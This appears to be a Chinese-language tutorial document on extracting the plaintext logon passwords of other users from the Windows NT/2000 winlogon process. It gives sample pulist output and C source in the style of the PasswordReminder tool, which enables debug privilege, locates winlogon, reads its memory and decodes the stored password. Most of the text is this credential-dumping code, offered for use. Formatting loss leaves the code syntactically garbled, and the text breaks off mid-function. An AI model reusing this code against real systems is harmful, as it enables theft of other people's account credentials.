获取windows登陆账户密码.doc

Windows Logon Process，Windows NT 用户登陆程序，管理用户登录和退出。因为登陆的域名和用户名是明文存储在winlogon进程里的，而Password是限定了查找本进程用户的密码，然后到winlogon进程的空间中查找UserDomain和UserName ，找到后就查后边的加密口令。其实只要你自己指定用户名和winlogon进程去查找就行了，只要你是管理员，任何本机用msgina.dll图形登陆的用户口令都可以找到。1. pulist，找到系统里登陆的域名和用户名，及winlogon进程id 2. 然后给每个winlogon进程id查找指定的用户就行了。example:C:Documents and Settingsbinglepulist Process PID User Idle 0 System 8 smss.exe 164 NT AUTHORITYSYSTEM csrss.exe 192 NT AUTHORITYSYSTEM winlogon.exe 188 NT AUTHORITYSYSTEM wins.exe 1212 NT AUTHORITYSYSTEM Explorer.exe 388 TEST-2KSERVERAdministrator internat.exe 1828 TEST-2KSERVERAdministrator conime.exe 1868 TEST-2KSERVERAdministrator msiexec.exe 1904 NT AUTHORITYSYSTEM tlntsvr.exe 1048 NT AUTHORITYSYSTEM taskmgr.exe 1752 TEST-2KSERVERAdministrator csrss.exe 2056 NT AUTHORITYSYSTEM winlogon.exe 2416 NT AUTHORITYSYSTEM rdpclip.exe 2448 TEST-2KSERVERclovea Explorer.exe 2408 TEST-2KSERVERclovea internat.exe 1480 TEST-2KSERVERclovea cmd.exe 2508 TEST-2KSERVERAdministrator ntshell.exe 368 TEST-2KSERVERAdministrator ntshell.exe 1548 TEST-2KSERVERAdministrator ntshell.exe 1504 TEST-2KSERVERAdministrator csrss.exe 1088 NT AUTHORITYSYSTEM winlogon.exe 1876 NT AUTHORITYSYSTEM rdpclip.exe 1680 TEST-2KSERVERbingle Explorer.exe 2244 TEST-2KSERVERbingle conime.exe 2288 TEST-2KSERVERbingle internat.exe 1592 TEST-2KSERVERbingle cmd.exe 1692 TEST-2KSERVERbingle mdm.exe 2476 TEST-2KSERVERbingle taskmgr.exe 752 TEST-2KSERVERbingle pulist.exe 2532 TEST-2KSERVERbingle具体实现代码如下双击代码全选#include #include #include #include typedef struct _UNICODE_STRING USHORT Length; USHORT MaximumLength; PWSTR Buffer; UNICODE_STRING, *PUNICODE_STRING; / Undocumented typedefs typedef struct _QUERY_SYSTEM_INFORMATION DWORD GrantedAccess; DWORD PID; WORD HandleType; WORD HandleId; DWORD Handle; QUERY_SYSTEM_INFORMATION, *PQUERY_SYSTEM_INFORMATION; typedef struct _PROCESS_INFO_HEADER DWORD Count; DWORD Unk04; DWORD Unk08; PROCESS_INFO_HEADER, *PPROCESS_INFO_HEADER; typedef struct _PROCESS_INFO DWORD LoadAddress; DWORD Size; DWORD Unk08; DWORD Enumerator; DWORD Unk10; char Name 0x108; PROCESS_INFO, *PPROCESS_INFO; typedef struct _ENCODED_PASSWORD_INFO DWORD HashByte; DWORD Unk04; DWORD Unk08; DWORD Unk0C; FILETIME LoggedOn; DWORD Unk18; DWORD Unk1C; DWORD Unk20; DWORD Unk24; DWORD Unk28; UNICODE_STRING EncodedPassword; ENCODED_PASSWORD_INFO, *PENCODED_PASSWORD_INFO; typedef DWORD (_stdcall *PFNNTQUERYSYSTEMINFORMATION) (DWORD, PVOID, DWORD, PDWORD); typedef PVOID (_stdcall *PFNRTLCREATEQUERYDEBUGBUFFER) (DWORD, DWORD); typedef DWORD (_stdcall *PFNRTLQUERYPROCESSDEBUGINFORMATION) (DWORD, DWORD, PVOID); typedef void (_stdcall *PFNRTLDESTROYQUERYDEBUGBUFFER) (PVOID); typedef void (_stdcall *PFNTRTLRUNDECODEUNICODESTRING) (BYTE, PUNICODE_STRING); / Private Prototypes BOOL IsWinNT (void); BOOL IsWin2K (void); BOOL AddDebugPrivilege (void); DWORD FindWinLogon (void); BOOL LocatePasswordPageWinNT (DWORD, PDWORD); BOOL LocatePasswordPageWin2K (DWORD, PDWORD); void DisplayPasswordWinNT (void); void DisplayPasswordWin2K (void); / Global Variables PFNNTQUERYSYSTEMINFORMATION pfnNtQuerySystemInformation; PFNRTLCREATEQUERYDEBUGBUFFER pfnRtlCreateQueryDebugBuffer; PFNRTLQUERYPROCESSDEBUGINFORMATION pfnRtlQueryProcessDebugInformation; PFNRTLDESTROYQUERYDEBUGBUFFER pfnRtlDestroyQueryDebugBuffer; PFNTRTLRUNDECODEUNICODESTRING pfnRtlRunDecodeUnicodeString; DWORD PasswordLength = 0; PVOID RealPasswordP = NULL; PVOID PasswordP = NULL; DWORD HashByte = 0; wchar_t UserName 0x400; wchar_t UserDomain 0x400; int _cdecl main( int argc, char* argv ) printf( nt To Find Password in the Winlogon processn ); printf( Usage: %s DomainName UserName PID-of-WinLogonnn, argv0 ); if (!IsWinNT () & (!IsWin2K () printf (Windows NT or Windows 2000 are required.n); return (0); / Add debug privilege to PasswordReminder - / this is needed for the search for Winlogon. / 增加PasswordReminder的权限 / 使得PasswordReminder可以打开并调试Winlogon进程 if (!AddDebugPrivilege () printf (Unable to add debug privilege.n); return (0); printf (The debug privilege has been added to PasswordReminder.n); / 获得几个未公开API的入口地址 HINSTANCE hNtDll = LoadLibrary (NTDLL.DLL); pfnNtQuerySystemInformation = (PFNNTQUERYSYSTEMINFORMATION) GetProcAddress (hNtDll, NtQuerySystemInformation); pfnRtlCreateQueryDebugBuffer = (PFNRTLCREATEQUERYDEBUGBUFFER) GetProcAddress (hNtDll, RtlCreateQueryDebugBuffer); pfnRtlQueryProcessDebugInformation = (PFNRTLQUERYPROCESSDEBUGINFORMATION) GetProcAddress (hNtDll, RtlQueryProcessDebugInformation); pfnRtlDestroyQueryDebugBuffer = (PFNRTLDESTROYQUERYDEBUGBUFFER) GetProcAddress (hNtDll, RtlDestroyQueryDebugBuffer); pfnRtlRunDecodeUnicodeString = (PFNTRTLRUNDECODEUNICODESTRING) GetProcAddress (hNtDll, RtlRunDecodeUnicodeString); / Locate WinLogons PID - need debug privilege and admin rights. / 获得Winlogon进程的PID / 这里作者使用了几个Native API，其实使用PSAPI一样可以 DWORD WinLogonPID = argc 3 ? atoi( argv3 ) : FindWinLogon () ; if (WinLogonPID = 0) printf (PasswordReminder is unable to find WinLogon or you are using NWGINA.DLL.n); printf (PasswordReminder is unable to find the password in memory.n); FreeLibrary (hNtDll); return (0); printf(The WinLogon process id is %d (0x%8.8lx).n, WinLogonPID, WinLogonPID); / Set values to check memory block against. / 初始化几个和用户账号相关的变量 memset(UserName, 0, sizeof (UserName); memset(UserDomain, 0, sizeof (UserDomain); if( argc 2 ) mbstowcs( UserName, argv2, sizeof(UserName)/sizeof(*UserName) ); mbstowcs( UserDomain, argv1, sizeof(UserDomain)/sizeof(*UserDomain) ); else GetEnvironmentVariableW(LUSERNAME, UserName, 0x400); GetEnvironmentVariableW(LUSERDOMAIN, UserDomain, 0x400); printf( To find %S%S password in process %d .n, UserDomain, UserName, WinLogonPID ); / Locate the block of memory containing / the password in WinLogons memory space. / 在Winlogon进程中定位包含Password的内存块 BOOL FoundPasswordPage = FALSE; if (IsWin2K () FoundPasswordPage = LocatePasswordPageWin2K (WinLogonPID, &PasswordLength); elseFoundPasswordPage = LocatePasswordPageWinNT (WinLogonPID, &PasswordLength); if (FoundPasswordPage) if (PasswordLength = 0) printf (The logon information is: %S/%S.n, UserDomain, UserName); printf (There is no password.n); else printf (The encoded password is found at 0x%8.8lx and has a length of %d.n, RealPasswordP, PasswordLength); / Decode the password string. if (IsWin2K () DisplayPasswordWin2K (); elseDisplayPasswordWinNT (); elseprintf (PasswordReminder is unable to find the password in memory.n); FreeLibrary (hNtDll); return (0); / main / / IsWinNT函数用来判断操作系统是否WINNT / BOOL IsWinNT (void) OSVERSIONINFO OSVersionInfo; OSVersionInfo.dwOSVersionInfoSize = sizeof (OSVERSIONINFO); if (GetVersionEx (&OSVersionInfo) return (OSVersionInfo.dwPlatformId = VER_PLATFORM_WIN32_NT); elsereturn (FALSE); / IsWinNT / / IsWin2K函数用来判断操作系统是否Win2K / BOOL IsWin2K (void) OSVERSIONINFO OSVersionInfo; OSVersionInfo.dwOSVersionInfoSize = sizeof (OSVERSIONINFO); if (GetVersionEx (&OSVersionInfo) return (OSVersionInfo.dwPlatformId = VER_PLATFORM_WIN32_NT) & (OSVersionInfo.dwMajorVersion = 5); elsereturn (FALSE); / IsWin2K / / AddDebugPrivilege函数用来申请调试Winlogon进程的特权 / BOOL AddDebugPrivilege (void) HANDLE Token; TOKEN_PRIVILEGES TokenPrivileges, PreviousState; DWORD ReturnLength = 0; if (OpenProcessToken (GetCurrentProcess (), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &Token) if (LookupPrivilegeValue (NULL, SeDebugPrivilege, &TokenPrivileges.Privileges0.Luid) TokenPrivileges.PrivilegeCount = 1; TokenPrivileges.Privileges0.Attributes = SE_PRIVILEGE_ENABLED; return(AdjustTokenPrivileges (Token, FALSE, &TokenPrivileges, sizeof (TOKEN_PRIVILEGES), &PreviousState, &ReturnLength); return (FALSE); / AddDebugPrivilege / / Note that the following code eliminates the need / for PSAPI.DLL as part of the executable. / FindWinLogon函数用来寻找WinLogon进程 / 由于作者使用的是Native API，因此不需要PSAPI的支持 / DWORD FindWinLogon (void) #define INITIAL_ALLOCATION 0x100 DWORD rc = 0; DWORD SizeNeeded = 0; PVOID InfoP = HeapAlloc (GetProcessHeap (), HEAP_ZERO_MEMORY, INITIAL_ALLOCATION); / Find how much memory is required. pfnNtQuerySystemInformation (0x10, InfoP, INITIAL_ALLOCATION, &SizeNeeded); HeapFree (GetProcessHeap (), 0, InfoP); / Now, allocate the proper amount of memory. InfoP = HeapAlloc (GetProcessHeap (), HEAP_ZERO_MEMORY, SizeNeeded); DWORD SizeWritten = SizeNeeded; if (pfnNtQuerySystemInformation (0x10, InfoP, SizeNeeded, &SizeWritten) HeapFree (GetProcessHeap (), 0, InfoP); return (0); DWORD NumHandles = SizeWritten / sizeof (QUERY_SYSTEM_INFORMATION); if (NumHandles = 0) HeapFree (GetProcessHeap (), 0, InfoP); return (0); PQUERY_SYSTEM_INFORMATION QuerySystemInformationP = (PQUERY_SYSTEM_INFORMATION) InfoP; DWORD i; for (i = 1; i HandleType = 5) PVOID DebugBufferP = pfnRtlCreateQueryDebugBuffer (0, 0); if (pfnRtlQueryProcessDebugInformation (QuerySystemInformationP-PID, 1, DebugBufferP) = 0) PPROCESS_INFO_HEADER ProcessInfoHeaderP = (PPROCESS_INFO_HEADER) (DWORD) DebugBufferP + 0x60); DWORD Count = ProcessInfoHeaderP-Count; PPROCESS_INFO ProcessInfoP = (PPROCESS_INFO) (DWORD) ProcessInfoHeaderP + sizeof (PROCESS_INFO_HEADER); if (strstr (_strupr (ProcessInfoP-Name), WINLOGON) != 0) DWORD i; DWORD dw = (DWORD) ProcessInfoP; for (i = 0; i Name), NWGINA) != 0) return (0); if (strstr (_strupr (ProcessInfoP-Name), MSGINA) = 0) rc = QuerySystemInformationP-PID; if (DebugBufferP) pfnRtlDestroyQueryDebugBuffer (DebugBufferP); HeapFree (GetProcessHeap (), 0, InfoP); return (rc); if (DebugBufferP) pfnRtlDestroyQueryDebugBuffer (DebugBufferP); DWORD dw = (DWORD) QuerySystemInformationP; dw += sizeof (QUERY_SYSTEM_INFORMATION); QuerySystemInformationP = (PQUERY_SYSTEM_INFORMATION) dw; HeapFree (GetProcessHeap (), 0, InfoP); return (rc); / FindWinLogon / / LocatePasswordPageWinNT函数用来在NT中找到用户密码 / BOOL LocatePasswordPageWinNT (DWORD WinLogonPID, PDWORD PasswordLength) #define USER_DOMAIN_OFFSET_WINNT 0x200 #define USER_PASSWORD_OFFSET_WINNT 0x400 BOOL rc = FALSE; HANDLE WinLogonHandle = OpenProcess (PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, WinLogonPID); if (WinLogonHandle = 0) return (rc); *PasswordLength = 0; SYSTEM_INFO SystemInfo; GetSystemInfo (&SystemInfo); DWORD PEB = 0x7ffdf000; DWORD BytesCopied = 0; PVOID PEBP = HeapAlloc (GetProcessHeap (), HEAP_ZERO_MEMORY, SystemInfo.dwPageSize); if (!ReadProcessMemory (WinLogonHandle, (PVOID) PEB, PEBP, SystemInfo.dwPageSize, &BytesCopied) Clos